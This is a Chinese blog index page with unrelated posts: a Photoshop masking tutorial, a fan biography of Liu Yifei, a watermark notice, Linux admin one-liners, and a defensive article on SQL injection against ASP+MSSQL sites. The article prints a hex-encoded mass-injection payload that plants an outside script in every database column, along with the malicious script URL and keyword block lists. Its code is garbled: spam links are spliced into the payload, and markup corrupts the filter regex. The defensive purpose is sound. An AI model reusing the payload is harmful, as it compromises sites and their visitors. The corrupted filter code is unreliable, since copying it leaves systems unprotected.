分页: 76/196 第一页 上页 71 72 73 74 75 76 77 78 79 80 下页 最后页 [ 显示模式: 摘要 | 列表 ]
Mar 12


看下效果图




下面我们来一步步的做~~
1、打开文件
2,点击图层面板选取通道
3,仔细看各个通道(为了是大家了解用通道抠图的原理,我选了张比较简单的图.)




通过对比,我们会发现,蓝色通道所显示的图像背景与人物对比比较明显,那么我们就选择蓝色通道进行操作.
4:复制蓝色通道.(右键点击蓝色通道,然后选择复制通道)

5;对蓝副本进行编辑,我们的目的是为了增大背景与人物的黑白对比度,所以我们可以用调节曲线的方法,调出调节曲线命令CTRL+M。进行调节,到什么程度呢?按你自己的眼光,最难扣的是头发,那当然要头发全部变黑,人物大部分也要变黑啊,像衣服那些比较白的地方,可以用画笔涂黑。



6.按下CTRL用鼠标点击蓝副本通道,就会载入选取,注意:这里载入的是没有涂黑的白色部分,大家要注意。

7;回到图层面板,选择图片,点击 选择--反选(shift+ctrl+i),这时我们就选中了人物部分。然后羽化(ctrl+alt+d)。数值不要太大。


8;ctrl+j复制所选区域,得到图层1,这时被选中部分就会被扣出图了。



9把背景设置不可见,就能看到你所扣出的图了,然后你可以对它进行各项编辑了。

Tags: , ,
Mar 12
  姓名:刘亦菲
  原名:刘茜美子
  小名:茜茜
  曾用名:安风
  英文名:Crystal
  称号:神仙姐姐
  生日:1987年8月25日
  血型:B型
  星座:处女座
  生肖:兔
  出生地:湖北省武汉市
  祖籍:湖北省武汉市
  国籍:美国
  身高:171cm
  体重:49kg
  语言:国语 英语 日语
  特长:钢琴,舞蹈,表演,唱歌
  性格:双重。安静时可以不说一句话一个人呆一整天,玩时又玩的特别疯。
  学历:北京电影学院表演系
  职业:演员、歌手、模特
  演艺经纪:红星坞娱乐传媒投资有限公司
  美国经纪:Creative Artists
  唱片公司:Sony Music Artists Inc(日本总部)
  幸运数字:6
  花语:樱花——千年之恋
  偶像:费雯丽、奥黛丽·赫本
  兴趣:坐过山车,荡轮船,听音乐,上体育课
  最尊敬的人:妈妈,姥姥
  最喜欢的歌星:席琳狄翁、王菲 、邓丽君
  最喜欢的颜色:粉色、亮色、金色、银色
  最喜欢的运动:网球、高尔夫球 、滑冰
  最喜欢的礼物:水晶,公仔娃娃
  最喜欢的食物:话梅、奶糖、芒果,西瓜,八宝粥
  最喜欢的地方:维也纳、巴黎、大理、洛杉矶 、北京
  最喜欢的动物:小狗
  最喜欢的电影:《乱世佳人》
  最讨厌的男孩子:抽烟、花言巧语、劈腿、虚伪
  圈中好友:舒畅、林志颖、陈好、黄晓明、胡歌、张纪中、江一燕、刘涛、杨幂、蒋欣
  刘亦菲1987年8月出生在武汉,父亲是大学教授,母亲是舞蹈演员,家境殷实富裕,10岁时随父母远赴美国。2002年年初回到北京,7月即被北京电影学院表演系破格录取。
  之后相继拍摄了电视剧《金粉世家》、《天龙八部》,尤以夺得万众瞩目的“神仙姐姐”王语嫣一角声名鹊起。
  目前代表作有《天龙八部》《神雕侠侣》《仙剑奇侠传》 《五月之恋》 《功夫之王》《阿宝的故事》《恋爱大赢家》《豆蔻年华》
【参演影片】
  参演电视
  2002──《金粉世家》饰白秀珠 [2]
  2003──《天龙八部》饰王语嫣 (配音:薛白)
  2004──《仙剑奇侠传》饰赵灵儿 (配音:李晔)
  2005──《豆蔻年华》饰小赵老师
  2005──《神雕侠侣》饰小龙女 (配音:季冠霖)
  参演电影
  2004年──《五月之恋》饰瑄瑄
  2004年──《恋爱大赢家》饰金巧莉
  2006年──《阿宝的故事》饰刘亦菲
  2007年──《功夫之王》 饰金燕子
【音乐专辑】
  国语专辑
  2006年──《刘亦菲》
  2006年──《我要我的滋味》
  日韩专辑
  2006年──《真夜中のドア [Maxi]》
  2006年──《All My Words》
【广告代言】
  2003年──金菲国际公寓形象代言人
  2004年──天顺加倍补水霜形象代言人
  2005年──潘婷品牌形象代言人
  2005年──圣马田休闲服形象代言人
  2005年──白鸽水果型饮料形象代言人
【亦菲寄言】
  我不是那种对自己有打算、有规划的人,但是在我心里一直有个目标:就是努力朝着艺术家的方向走,我不想做肤浅的、昙花一现的明星。
  我是一个中国人,也不会刻意去打,去脱衣,这要看我是否喜欢并且适合的角色。我觉得自己其实是很中国化的,民族的才是世界的,我没有必要去迎合什么,只是做我自己就好。而这也是我认为的优势与空间。
  我要感谢那些在异乡的艰难,要感谢那些流言蜚语,让我变得更加淡定、坚定,不为世俗所扰;我要感谢那些折磨我的人,是他们让我心灵真正成长,变得更加强韧、优雅有度!
  物质的方面,我想告诉大家这些东西羡慕别人完全没有必要。凭自己的能力获得你应有的生活品质,这才是正确的思想。况且现在的一切都是父母给我的,并不是我自己创造出来的财富,所以别人没什么好羡慕的,我也不会认为自己有多本事。等将来我自己拥有这一切的时候才值得骄傲呢!
  (十九岁的年轻女孩儿,对自我的人生观、价值观、世界观能够有如此高的认识,能够有这样的一种自我独立的思想真的很难得。体现了亦菲身为天之骄女相当独立的一面,不骄不躁,自强不息!对众多现在的小皇帝小公主们有非常好的教化意义。)
  说实话,我并不觉得美貌有什么,也不觉得自己有多漂亮,一个人的个性气质和才学才是最重要的。哪怕我长得不够美,但是有足够的个性,足够的特点,足够的才学,我觉得也是很有魅力的。况且,对于演员来讲,容貌不是唯一的,如果有好的容貌,再加上出色的演技,那样才够完美。
  (身为偶像型艺人,亦菲无疑是具有相当出色的先天条件,但美丽真的不是她的唯一武器。美丽也并不属于亦菲的专有,而亦菲对于自己所拥有的这份美丽既没有否认,也没有过份的依赖,而是充分的认知到除了美丽之外还有许多比外在美更加重要的素质值得自己去不断努力发掘和进步。)
  我觉得,人就像一件艺术作品,每个阶段都有不同的魅力,不同的缺点和优点。比如现阶段我的演技不是很纯熟,但同时我也拥有这个年龄特有的东西。人都有一个成长的过程,我正在一步一步地进步,只要给我时间,我相信我会是很好的演员。
  (自信而不骄傲。人最难的不是如何认识别人,而是如何认清自己,尤其是充分认识自己一切的优点和缺点,而这一点,亦菲做到了。无论是身处于逆境亦或是顺境,她永远都保持着一颗平常心以及清醒的状态,充分的认知着自己的得失,也一步步计划着自己长远的将来。有人说“给我一个支点,我就能翘动地球”,这也许只是一句幻想。但亦菲说“只要给我时间,我相信我会是很好的演员!”却是一句大实话。因为我们永远相信,我们的小公主永远是最棒的!我这是自信的表现,“自信+努力”是Superstar最IN的资本)
  我会把每一天的时间都安排的很满,每一分钟都要充分利用起来,虽然会很累,但是我会很开心。其实想想自己这么努力的架势,真是有点自虐的心态,但是没办法,我就是这样,不学习就会觉得亏。有时候偶尔让自己轻松一些,玩一会,就会觉得,哎呀,怎么浪费了这么多时间,可以学到多少东西啊!呵呵,所以不玩了,努力学习,我喜欢学习的状态。
  (主动的学习事半功倍,被动的学习事倍功半。亦菲对待学习的态度很值得所有的年轻人学习。有些人目标相当的远大,但却没有付之于行动,一切只在镜花水月;而亦菲的目标远大,却一直为之努力着,每一步都在付出辛苦的劳作和学习。虽然看似辛苦,但实际上一分耕耘总有一分收获。相信在辛苦之后一定会换来丰收的喜悦。这是一种态度,也是一种坚持!)
  微笑是种态度。
  (微笑,人人都会。一时的微笑很是轻松写意,但要永远微笑却是一件极度困难的事情。用微笑面对人生,看似简单,却是极难。难的并不是在快乐时微笑,也不是在顺境时微笑,而是在逆境中,在面对一些不快乐,甚至是不公平的事情的时候,你依旧能够从内心深处绽放出甜美的笑容,笑对人生,笑对一切。能够笑到最后的人,才是的最甜最美的人。用心微笑,用微笑的态度过生活,这就是成功者的证明。)
  机遇只是给了你一个很好的起点接下来怎么做就要看你自己。
  (命运是最公平的,也是最不公平的。它给予每个人不同的机遇、不同的命运,但机率永远是相等的,这是大数法则。但为什么那么多人都各自走出完全不同的命运?有人欢喜有人忧,有人成功有人失败?那是因为有人擅长于把握机遇,借着机遇的来临让自己从一个成功走向另一个成功;而有的人一生都在等待机遇,却又因为自己的无能或别的原因而一次又一次的错失机遇。亦菲就是一个非常擅长于把握机遇并且非常努力的艺人,所以她的人生与事业才会如此成功。)
【杂志封面】
  2004.12期《宠物派》
  2005.06月《时尚娇点》等
  2008.04月《时尚巴莎》
  2008.04月《影视艺苑》大本的
  2008.04月《生活》
  2008.05月《影视艺苑》
  2008.06月《影视艺苑》快讯版
  2008.06月《新旅行》
  2009.02月《悦己》
  2009.02月《VOGUE》
【个性爱好】
  她其实很像她演过《仙剑奇侠传》里的赵灵儿,本是一个受保护的快乐少女,在仙灵岛过着神仙一般的生活。天真如白纸,潜力却深不见底;柔弱如婴儿,勇气却不能估计;无知如傻子,心境却特别澄明。
  只有这样依旧天真无邪的女孩儿,才可以在回应和郎朗的绯闻时,心无城府地说,“我觉得弹钢琴和弹棉花没什么不一样啊!”
  那么可爱的回答,让人看穿了她还只是个小孩子。所以她喜欢看的是侦探小说和电影,最爱去游乐场玩儿,胆子还特别大,不久前才在日本排了半小时的队玩了号称世界最高的跳楼机,但刘亦菲说,那样的游戏试过一次就可以了。喜欢新鲜,但懂得适可而止,这也是她性格的一部分。
  她最好奇的仍是卡通世界,总希望自己能像爱丽丝一样梦游仙境,变成里面的人或动物,去见识一下那个可以天马行空的世界究竟是什么样子。“你不觉得那个世界跟我们太不一样了吗?宫崎峻的《龙猫》里的那些小动物,怎么都那么可爱啊。”
  跟同龄的女孩子一样,她也喜欢玩具和布偶,现在已经积攒了近百个芭比娃娃,每天晚上,这些娃娃陪伴她进入梦乡,她最喜欢的是一款限量发售的陶瓷芭比:纤柔的线条、艳丽的晚装、腕上轻挽着一个鸡蛋手提袋,手套梳子一应俱全。
  而收藏水晶饰品是她另一个兴趣爱好,朋友们都带点羡慕的叫她“crys-tal”。在她的家里,珍藏着一柜子的水晶摆件,自从一次过生日,妈妈送给她第一顶水晶小红帽后,她的水晶童话便开始了。
  无论是拍戏还是旅游,每到一地,她的第一件事就是逛水晶店;过生日,别人问她要什么,答案永远只有两个字:水晶;每次拍完戏回家,她都会拿天鹅绒布一件一件的擦拭这些宝贝,而且从来不让别人碰一下,随着水晶摆件的增多,原先的柜子装不下,她还专门到水晶展览会上买了一个展柜回家。
  刘亦菲15岁时就被破格录取进入北京电影学院表演系学习,是这个班里年纪最小,但同时又是接戏机会最多、名气最大的一个学生,在班上,甚至都会有同学帮自己的亲朋好友找她要签名。
  她的个性是属于内向,不擅主动交朋友的类型,而在电影学院的四年,她有大半时间在外拍戏,所以同学里并没有特别亲密的知交好友,“入学的时候,他们都觉得我太小了,大家谈不来……其实我都没有太多机会和他们说话,他们开始觉得跟我没什么共同的话题。但后来接触的时间长了,他们觉得其实我还是挺懂事的。”
  从小到大,刘亦菲交的朋友都是比她大很多的,“我10岁那会儿有一帮空姐的朋友,因为我经常到处被‘寄’来‘寄’去,好比说我妈在外地演出,可能我一个人过去找她,就会托空姐把我带过去。所以我当时有特别多的大朋友。她们什么话都跟我说,我觉得跟这些大人相处可以学到一些东西吧,成长得很快。”
  尽管很早就有了周游列国的经历,但刘亦菲最喜欢的还是美国,在那边生活的短短四年时间给了她太多美好的回忆。最难忘的是在美国度过的第一个万圣节,这一天小朋友们都挨家挨户的敲门要糖,她就曾和四五个小伙伴一起从下午5点出去,到晚上9点还没回来,把妈妈吓得差点报警。她的大部分知心朋友也是那个时期交的,至今仍保持着联络。其中有一个俄罗斯的女孩儿,永远梳着两条长长的麻花辫,她是亦菲心目中真正的公主。
  她也喜欢欧洲,但更向往的是18世纪的欧洲,她喜欢那个时期华丽的城堡、漂亮的宫廷礼服、可以为爱剑挑情敌的英俊王子。
  19岁的刘亦菲至今还没有谈恋爱的经历,但却要在戏里面和许多帅哥谈情说爱,曾经就有媒体质疑过她如何把握爱情戏,她觉得不是问题,“不是一定要有感情经历才会演感情戏,导演会指导我怎么做。”对于爱情她仍抱着像小龙女那样浪漫单纯的想像,但就目前而言,她觉得以自己的年纪谈爱情还太早了点儿。
  刘亦菲坦言自己心目中最有魅力的男人是布拉德•彼特,“他很帅,也是有实力的演员。我很小的时候就看过他演的《夜访吸血鬼》,他演那种另类的、变态的角色也非常生动。”而在女演员中,她的榜样是奥黛丽·赫本,能成为赫本一样兼具美丽知性优雅和爱心于一身的女人是刘亦菲最大的梦想,亦是她一生努力的方向。 我们或可期待……
【获奖纪录】
  2005年:
  MTV2005超级盛典最具风格演艺圈新势力
  TOM2005娱乐英雄会最受网民欢迎四大名旦之一
  TOM2005娱乐英雄会最受网民推崇电视剧--<仙剑奇侠传>
  2006年:
  影响2006.时尚盛典大奖
  “娱乐中国.2006星光大典”最具人气女偶像奖、最具魅力女星奖
  “网络.娱乐.英雄会”2006 TOM在线荣耀盛典四大名旦之一 年度最受欢迎武侠剧--<神雕侠侣>
  2006第二届中国国际电视广告艺术节-最受观众喜爱明星诚信奖
  “我们的奥运———微笑中国2008”奥运笑脸形象代言人
  剧风行动-2006网络评选最美丽的公主
  2006“[雪碧]中国原创音乐流行榜”最喜爱内地人气偶像奖、金曲奖<心悸>
  2006年风度杂志MAXIM被选为亚洲最性感的50位女明星
  2006年网易娱乐频道“女星美腿PK台”亦菲成为首位入驻PK台[名人堂]的女星
  2006中国全球王者之星 年度调查 最具闪耀之星50强 最具荣耀之星50强 王者之星50强
  2007年:
  2007大学生音乐节――最受推崇风尚艺人奖
  2007年时尚奥丝卡十大时尚皇后
  《风尚志》“2007年度明星风尚权力榜”年度风尚突破女明星
  2008年:
  2008年时尚芭莎十大慈善明星之一
  2009年:
  搜狐年度盛典搜索人气奖
  百度娱乐沸点“最沸点女明星”
  2005年──瑞珠聚乙烯醇滴眼液形象代言人
  2005年──完美世界网络游戏形象代言人
  2006年──伊利优酸乳代言人,并且亲自唱主题曲
  2006年──第六届金鹰女神
  2007年──代言韩国的时尚化妆品牌“蓝色之恋”
  2007年──代言香港服饰品牌“卓多姿”
  2007年──爱狗卡代言人
  2008年──中国少年儿童基金会形象大使
  2008年──代言苏州太湖山水
  2008年──卡尼尔水润凝萃系列代言人
  2008年──卡尼尔多效眼部走珠精华露
  2008年──卡尼尔真彩净白乳液形象代言人
Tags: ,
Mar 12
今天给刘亦菲中文网做了个透明水印,例似于TOM论坛的那种!有需要的朋友可以给我留言,留下你的网站域名和你的接收E-mail地址。
点击在新窗口中浏览此图片
点击在新窗口中浏览此图片
Tags: ,
Mar 11
正 文:

    这阵子,采用ASP+MSSQL设计的很多网站可能遭遇到sql数据库被挂马者插入JS木马的经历;这不,朋友的一个网站就被黑客忽悠了一把,mssql的每个varchar、text字段都被自动插入一段js代码,即使删除这段代码,如果没有从源头上解决,几分钟后,js代码就又会自动插入数据库。

    经过飘易的观察,这很有可能是程序自动执行的,黑客先从搜索引擎google、百度等搜索存在漏洞的采用asp+mssql设计的网站,然后采用小明子这样的注入扫描工具,扫描整个网站,一旦发现有sql注入的漏洞或者上传漏洞,黑客就通过各种手段,上传自己的大马,如海阳木马;然后,黑客就把这个网站纳入他的肉鸡列表,随时在数据库里加入自己希望加的js代码,而这些代码往往是包含着众多的的病毒、木马,最终让访问受控网站的用户的电脑中毒。

    虽然,可以通过sql查询分析器执行批量代换,暂时解决被插入的js代码问题,然而不从根本上解决整个网站存在的漏洞,包括程序上和服务器安全权限,那么黑客还是随时可以入侵你的网站数据库。

    在sql查询分析器里可以执行以下的代码批量替换js代码:
update 表名 set 字段名=replace(字段名,'<Script Src=http://c.n%75clear3.com/css/c.js></Script>','')

    flymorn仔细检查了网站,发现网站存在几个安全问题:

    第一,网站存在上传漏洞;虽然,上传文件需要管理员身份验证,也对上传文件进行了文件格式的认证,但管理员身份验证采用了cookies,而cookies是可以被伪造的,而且如果上传了图片后,不对该文件的内容采取任何判断的话,那么图片木马也很有可能被上传。

    flymorn的解决措施:1 删除上传文件功能(不太实际);2 修改上传用户验证为session验证;3 对上传后的文件内容进行验证,如果是图片木马,则删除;可以参考以下的验证代码:
''===============判断上传文件是否含非法字符串start================
set MyFile = server.CreateObject("Scripting.FileSystemObject")
set MyText = MyFile.OpenTextFile(Server.mappath(filePath), 1) '读取文本文件
sTextAll = lcase(MyText.ReadAll)
MyText.close
set MyFile = nothing
sStr="<%|.getfolder|.createfolder|.deletefolder|.createdirectory|.deletedirectory|.saveas|wscript.shell|script.encode|server.|.createobject|execute|activexobject|language="
sNoString = split(sStr,"|")
for i=0 to ubound(sNoString)
  if instr(sTextAll,sNoString(i)) then
    set filedel = server.CreateObject("Scripting.FileSystemObject")
    filedel.deletefile Server.mappath(filePath)
    set filedel = nothing
    Response.Write("<script>alert('您上传的文件有问题,上传失败!');history.back();</script>")
    Response.End
  end if
next
''=================判断上传文件是否含非法字符串end===================

     第二,网站存在cookies注入漏洞。由于程序设计中,为了考虑到减小服务器的开销,所有用户登陆后采用cookies验证,这个cookies里保存了用户的 ID 和 NAME ,而众所周知,cookies是经常被黑客伪造的,这是其一;另外,某些外部参数 没有采用严格的 request.form 和 request.querystring 来获取内容,为了简便,采用了 request("id") 这样的方式。

     我们知道,ASP 的request 是先从form、querystring里获取内容,如果这两个为空,则要从cookies里获取内容,大家往往在程序设计中考虑到了 request.form 和 request.querystring 的SQL注入,所以一般都会过滤 request.form 和 request.querystring进行sql注入;但却偏偏忘了过滤cookies方式下的注入。我们来看下下面这样的sql语句:
SQL="select * from 表名 where id="&request("id")

    如果这个 id 恰巧是通过cookies来获取值的,那么想想,这是一件多么可怕的事啊!注入者可以轻松的伪造一个名为 id 的虚假 cookies ,因为这个 id 的cookies 是服务器分配给客户端的。这个cookies可以被伪造成类似下面这样的一段代码:
dEcLaRe @s vArChAr(4000);sEt @s=cAsT(0x6445634c615265204074207641724368417228323535292c406320764172436841722832353529206445634c6
15265207441624c655f637572736f5220635572536f5220466f522073456c456354206 IT人才网(http://it.ad0.cn) 12e6e416d452c622e6e416d
452046724f6d207359734f624a6543745320612c735973436f4c754d6e53206220774865526520612e694www.ad0.cn43d622e6
94420416e4420612e78547950653d27752720416e442028622e78547950653d3939206f5220622e78547950653d3
335206f5220622e78547950653d323331206f5220622e78547950653d31363729206f50654e207441624c655f6375
72736f52206645744368206e6578742046724f6d207441624c655f637572736f5220694e744f2040742c4063207768
696c6528404066457443685f7374617475733d302920624567496e20657865632827557044615465205b272b40742
b275d20734574205b272b40632b275d3d727472696d28636f6e7665727428764172436841722c5b272b40632b275
d29292b27273c2f7469746c653e3c736372697074207372633d687474703a2f2f2536622536622533362532652537
352537332f312e6a733e3c2f7363726970743e27272729206645744368206e6578742046724f6d207441624c655f6
37572736f5220694e744f2040742c406320654e6420634c6f5365207441624c655f637572736f52206445416c4c6f4
3615465207441624c655f637572736f520d0a aS vArChAr(4000));exec(@s);--

看晕了吧。这是利用HEX的方式进行SQL注入,可以绕过一般的IDS验证,只要系统存在SQL注入,上面的代码将会被执行,通过游标遍历数据库中的所有表和列并在列中插入js代码。

     飘易采取的解决办法:1 严格过滤 request.form 和 request.querystring 获取的内容,坚决不用 request("name") 这样的方式获取值,凡是采用 cookies 保存的内容,尽量不要用在sql语句里进行查询数据库操作;2 重要的用户资料尽量采用 session 验证,因为session是服务器端的,客户端无法伪造数据,除非他有你服务器的权限。

     可以采用以下的防范 get 、post以及cookies 注入的代码来过滤 sql 注入攻击:
<%
Response.Buffer = True  '缓存页面
'防范get注入
If Request.QueryString <> ""  Then StopInjection(Request.QueryString)
'防范post注入
If Request.Form <> ""  Then StopInjection(Request.Form)
'防范cookies注入
If Request.Cookies <> ""  Then StopInjection(Request.Cookies)

'正则子函数
Function StopInjection(Values)
Dim regEx
Set regEx = New RegExp
    regEx.IgnoreCase = True
    regEx.Global = True
    regEx.Pattern = "'|;|#|([\s\b+()]+([email=select%7Cupdate%7Cinsert%7Cdelete%7Cdeclare%7C@%7Cexec%7Cdbcc%7Calter%7Cdrop%7Ccreate%7Cbackup%7Cif%7Celse%7Cend%7Cand%7Cor%7Cadd%7Cset%7Copen%7Cclose%7Cuse%7Cbegin%7Cretun%7Cas%7Cgo%7Cexists)[/s/b]select|update|insert|delete|declare|@|exec|dbcc|alter|drop|create|backup|if|else|end|and|or|add|set|open|close|use|begin|retun|as|go|exists)[\s\b[/email]+]*)"
    Dim sItem, sValue
    For Each sItem In Values
        sValue = Values(sItem)
        If regEx.Test(sValue) Then
            Response.Write "<Script Language=javascript>alert('非法注入!你的行为已被记录!!');history.back(-1);</Script>"
            Response.End
        End If
    Next
    Set regEx = Nothing
End function
%>

     把以上的代码另存为一个文件,如 antisql.asp ,然后在数据库连接文件开头包含这个文件 <!--#include file="antisql.asp"--> ,就可以实现全站的防范 sql 注入的攻击了。

     第三,严格过滤外部提交数据。判断提交页面的来源,如果不是当前站点,则拒绝提交。可以参考以下的代码,虽然来源网址可以伪造,但有这样的判断,毕竟可以阻挡那些没有技术含量的恶意提交:
<%''判断来源,禁止外部提交
dim server_v1,server_v2
server_v1=Cstr(Request.ServerVariables("HTTP_REFERER"))
server_v2=Cstr(Request.ServerVariables("SERVER_NAME"))
if server_v1="" or instr(server_v1,"发表页面名")<=0 or mid(server_v1,8,len(server_v2))<>server_v2 then
response.write "<SCRIPT language=JavaScript>alert('来源非法,禁止外部提交!');"
response.write "this.location.href='vbscript:history.back()';</SCRIPT>"
response.end
end if%>

     第四,做好服务器权限的分配。对于数据库的权限,尽量分配最小的权限给用户使用,如果把sa或管理员的权限分下来,一旦被攻击沦陷,这将是一个毁灭性的打击。mssql 的1433端口,飘易建议不用的时候,最好关闭。

     总之,安全问题是一个综合的问题,一个小的细节,可能让你的几个月甚至几年的心血付之东流。我们不仅要从程序上着手每个细节,而且要仔细做好服务器的安全工作,对于虚拟主机的用户,还要防范服务器上的跨站攻击。细节决定成败。
Mar 7
1、删除0字节文件    find . -type f -size 0 -exec rm -rf {} ; 或 find . type f -size 0 -delete
2、查看进程,按内存从大到小排列    ps -e -o “%C : %p : %z : %a”|sort -k5 -nr
3、按cpu利用率从大到小排列    ps -e -o “%C : %p : %z : %a”|sort -nr
4、打印cache里的URL    grep -r -a jpg /data/cache/* | strings | grep “http:” | awk -F’http:’ ‘{print “http:”$2;}’
5、查看http的并发请求数及其TCP连接状态    netstat -n | awk ‘/^tcp/ {++S[$NF]} END {for(a in S) print a, S[a]}’
6、sed在这个文里Root的一行,匹配Root一行,将no替换成yes。    sed -i ‘/Root/s/no/yes/’ /etc/ssh/sshd_config
7、如何杀掉mysql/apache进程    ps aux |grep mysql |grep -v grep  |awk ‘{print $2}’ |xargs kill -9 或 killall -TERM mysqld,kill -9 `cat /usr/local/apache2/logs/httpd.pid`
8、显示运行3级别开启的服务(从中了解到cut的用途,截取数据)      ls /etc/rc3.d/S* |cut -c 15-
9、如何在编写SHELL显示多个信息,用EOF
cat << EOF
+————————————————————–+
|   === Welcome to Tunoff services ===                         |
+————————————————————–+
EOF

10、for的用法(如给mysql建软链接)
cd /usr/local/mysql/bin
for i in *
do ln /usr/local/mysql/bin/$i /usr/bin/$i
done

11、获取IP地址    ifconfig eth0 |grep “inet addr:” |awk ‘{print $2}’|cut -c 6- 或ifconfig | grep ‘inet addr:’| grep -v ’127.0.0.1′ |cut -d: -f2 | awk ‘{ print $1}’
12、内存的大小    free -m |grep “Mem” | awk ‘{print $2}’
13、查看80端口的连接,并排序    netstat -an -t | grep “:80″ | grep ESTABLISHED | awk ‘{printf “%s %sn”,$5,$6}’ | sort
14、查看Apache的并发请求数及其TCP连接状态      netstat -n | awk ‘/^tcp/ {++S[$NF]} END {for(a in S) print a, S[a]}’
15、统计一下服务器下面所有的jpg的文件的大小    find / -name *.jpg -exec wc -c {} ;|awk ‘{print $1}’|awk ‘{a+=$1}END{print a}’
16、CPU的数量    cat /proc/cpuinfo |grep -c processor
17、CPU负载    cat /proc/loadavg
18、CPU负载    mpstat 1 1
19、内存空间    free
20、磁盘空间    df -h
21、如发现某个分区空间接近用尽,可以进入该分区的挂载点,用以下命令找出占用空间最多的文件或目录    du -cks * | sort -rn | head -n 10
22、磁盘I/O负载    iostat -x 1 2
23、网络负载    sar -n DEV
24、网络错误    netstat -i 或 cat /proc/net/dev
25、网络连接数目      netstat -an | grep -E “^(tcp)” | cut -c 68- | sort | uniq -c | sort -n
26、进程总数    ps aux | wc -l
27、查看进程树    ps aufx
28、可运行进程数目    vmwtat 1 5
29、检查DNS Server工作是否正常,这里以61.139.2.69为例    dig www.baidu.com @61.139.2.69
30、检查当前登录的用户个数    who | wc -l
31、日志查看、搜索    cat /var/log/rflogview/*errors    grep -i error /var/log/messages   grep -i fail /var/log/messages  tail -f -n 2000 /var/log/messages
32、内核日志    dmesg
33、时间      date
34、已经打开的句柄数    lsof | wc -l
35、网络抓包,直接输出摘要信息到文件。    tcpdump -c 10000 -i eth0 -n dst port 80 > /root/pkts
36、然后检查IP的重复数 并从小到大排序 注意 “-t  +0″ 中间是两个空格,less命令的用法。    less pkts | awk {‘printf $3″n”‘} | cut -d. -f 1-4 | sort | uniq -c | awk {‘printf $1″ “$2″n”‘} | sort -n -t  +0
37、kudzu查看网卡型号    kudzu –probe –class=network
Tags: ,
分页: 76/196 第一页 上页 71 72 73 74 75 76 77 78 79 80 下页 最后页 [ 显示模式: 摘要 | 列表 ]